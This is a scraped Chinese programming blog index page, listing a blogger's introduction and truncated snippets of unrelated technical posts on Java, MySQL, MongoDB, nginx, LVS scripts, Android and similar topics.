    你好,欢迎来到我的博客!我是【菜鸟不学编程】  我是一个正在奋斗中的职场码农,步入职场多年,正在从“小码农”慢慢成长为有深度、有思考的技术人。在这条不断进阶的路上,我决定记录下自己的学习与成长过程,也希望通过博客结识更多志同道合的朋友。    ️主要方向包括Java基础、Spring全家桶、数据库优化、项目实战等,也会分享一些踩坑经历与面试复盘,希望能为还在迷茫中的你提供一些参考。  我相信:写作
  • HttpClient 4.3与4.3版本以下版本比较 spjich javahttpclient
    网上利用java发送http请求的代码很多,一搜一大把,有的利用的是java.net.*下的HttpURLConnection,有的用httpclient,而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 httpclient又可分为 httpclient3.x httpclient4.x到httpclient4.3以下 httpclient4.3
  • Essential Studio Enterprise Edition 2015 v1新功能体验 Axiba .net
    概述:Essential Studio已全线升级至2015 v1版本了!新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件,还有其他一些控件功能升级,精彩不容错过,让我们一起来看看吧! syncfusion公司是世界领先的Windows开发组件提供商,该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本
  • [宇宙与天文]微波背景辐射值与地球温度 comsci 背景
            宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢?      如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢?   &nbs
  • lvs-server 男人50 server
    #!/bin/bash # # LVS script for VS/DR # #./etc/rc.d/init.d/functions # VIP=10.10.6.252 RIP1=10.10.6.101 RIP2=10.10.6.13 PORT=80 case $1 in start)   /sbin/ifconfig eth2:0 $VIP broadca
  • java的WebCollector爬虫框架 oloz 爬虫
    WebCollector主页: https://github.com/CrawlScript/WebCollector 下载:webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 接下来看demo package org.spider.myspider; import cn.edu.hfut.dmic.webcollector.cra
  • jQuery append 与 after 的区别 小猪猪08
    1、after函数 定义和用法: after() 方法在被选元素后插入指定的内容。 语法: $(selector).after(content) 实例: <html> <head> <script type="text/javascript" src="/jquery/jquery.js"></scr
  • mysql知识充电 香水浓 mysql
    索引 索引是在存储引擎中实现的,因此每种存储引擎的索引都不一定完全相同,并且每种存储引擎也不一定支持所有索引类型。 根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引,总索引长度至少为256字节。 大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种:BTREE和HASH,具体和表的存储引擎相关; MYISAM和InnoDB存储引擎
  • 我的架构经验系列文章索引 agevs 架构
    下面是一些个人架构上的总结,本来想只在公司内部进行共享的,因此内容写的口语化一点,也没什么图示,所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全,希望抛砖引玉,大家互相讨论。 要注意,我这些文章是一个总体的架构经验不针对具体的语言和平台,因此也不一定是适用所有的语言和平台的。 (内容是前几天写的,现附上索引)   前端架构 http://www.
  • Android so lib库远程http下载和动态注册 aijuans andorid
    一、背景      在开发Android应用程序的实现,有时候需要引入第三方so lib库,但第三方so库比较大,例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验,发现通过远程下载so文件,然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。   二、主要
  • linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法 baalwolf option
    在客户端访问subversion版本库时出现这个错误: svnserve.conf:12: Option expected 为什么会出现这个错误呢,就是因为subversion读取配置文件svnserve.conf时,无法识别有前置空格的配置文件,如### This file controls the configuration of the svnserve daemon, if you##
  • MongoDB的连接池和连接管理 BigCat2013 mongodb
    在关系型数据库中,我们总是需要关闭使用的数据库连接,不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制,如果正对此有疑惑的朋友可以看一下。 通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧,mongoDB中当我们new一个Mongo的时候,会发现它也
  • AngularJS使用Socket.IO bijian1013 JavaScriptAngularJSSocket.IO
            目前,web应用普遍被要求是实时web应用,即服务端的数据更新之后,应用能立即更新。以前使用的技术(例如polling)存在一些局限性,而且有时我们需要在客户端打开一个socket,然后进行通信。         Socket.IO(http://socket.io/)是一个非常优秀的库,它可以帮你实
  • [Maven学习笔记四]Maven依赖特性 bit1129 maven
    三个模块 为了说明问题,以用户登陆小web应用为例。通常一个web应用分为三个模块,模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web, user-service依赖于user-core user-web依赖于user-core和user-service   依赖作用范围  Maven的dependency定义
  • 【Akka一】Akka入门 bit1129 akka
    什么是Akka Message-Driven Runtime is the Foundation to Reactive Applications In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio
  • zabbix_api之perl语言写法 ronin47 zabbix_api之perl
    zabbix_api网上比较多的写法是python或curl。上次我用java--http://bossr.iteye.com/blog/2195679,这次用perl。for example: #!/usr/bin/perl use 5.010 ; use strict ; use warnings ; use JSON :: RPC :: Client ; use
  • 比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在! brotherlamp linux运维工程师linux运维工程师教程linux运维工程师视频linux运维工程师资料linux运维工程师自学
    比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在!   ----------------------------------------------------- 兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 链接:http://pan.baidu.com/s/1i3GQtGL 密码:bl65   兄弟连Lin
  • bitmap求哈密顿距离-给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y( bylijinnan java
    import java.util.Random; /** * 题目: * 给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5), * 使得他们的哈密顿距离(d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|)最大
  • map的三种遍历方法 chicony map
    package com.test; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Set; public class TestMap { public static v
  • Linux安装mysql的一些坑 chenchao051 linux
    1、mysql不建议在root用户下运行   2、出现服务启动不了,111错误,注意要用chown来赋予权限, 我在root用户下装的mysql,我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)  chown -R cc /etc/init.d/mysql
  • Sublime Text 3 配置 daizj 配置Sublime Text
    Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项:no_bold不显示粗体字,no_italic不显示斜体字,no_antialias和
  • MySQL server has gone away 问题的解决方法 dcj3sjt126com SQL Server
    MySQL server has gone away 问题解决方法,需要的朋友可以参考下。 应用程序(比如PHP)长时间的执行批量的MYSQL语句。执行一个SQL,但SQL语句过大或者语句中含有BLOB或者longblob字段。比如,图片数据的处理。都容易引起MySQL server has gone away。 今天遇到类似的情景,MySQL只是冷冷的说:MySQL server h
  • javascript/dom:固定居中效果 dcj3sjt126com JavaScript
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&
  • 使用 Spring 2.5 注释驱动的 IoC 功能 e200702084 springbean配置管理IOCOffice
    使用 Spring 2.5 注释驱动的 IoC 功能 developerWorks 文档选项 将打印机的版面设置成横向打印模式 打印本页 将此页作为电子邮件发送 将此页作为电子邮件发送 级别: 初级 陈 雄华 ([email protected]), 技术总监, 宝宝淘网络科技有限公司 2008 年 2 月 28 日  &nb
  • MongoDB常用操作命令 geeksun mongodb
    1.   基本操作 db.AddUser(username,password)               添加用户 db.auth(usrename,password)      设置数据库连接验证 db.cloneDataBase(fromhost)    
  • php写守护进程(Daemon) hongtoushizi PHP
    转载自: http://blog.csdn.net/tengzhaorong/article/details/9764655   守护进程(Daemon)是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。   1、基本概念   &nbs
  • spring整合mybatis,关于注入Dao对象出错问题 jonsvien DAOspringbeanmybatisprototype
    今天在公司测试功能时发现一问题: 先进行代码说明: 1,controller配置了Scope="prototype"(表明每一次请求都是原子型)    @resource/@autowired service对象都可以(两种注解都可以)。 2,service 配置了Scope="prototype"(表明每一次请求都是原子型)
  • 对象关系行为模式之标识映射 home198979 PHP架构企业应用对象关系标识映射
    HELLO!架构   一、概念 identity Map:通过在映射中保存每个已经加载的对象,确保每个对象只加载一次,当要访问对象的时候,通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射,Mapper类的getFromMap方法就是实现标识映射的实现。     二、为什么要使用标识映射? 在数据源架构模式之数据映射器中 //c
  • Linux下hosts文件详解 pda158 linux
     1、主机名:   无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。   公网:IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。   局域网:每台机器都有一个主机名,用于主机与主机之间的便于区分,就可以为每台机器设置主机
  • nginx配置文件粗解 spjich javanginx
    #运行用户#user  nobody;#启动进程,通常设置成和cpu的数量相等worker_processes  2;#全局错误日志及PID文件#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  inf
  • 数学函数 w54653520 java
    public  class  S {        // 传入两个整数,进行比较,返回两个数中的最大值的方法。      public  int  get( int  num1, int  nu
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他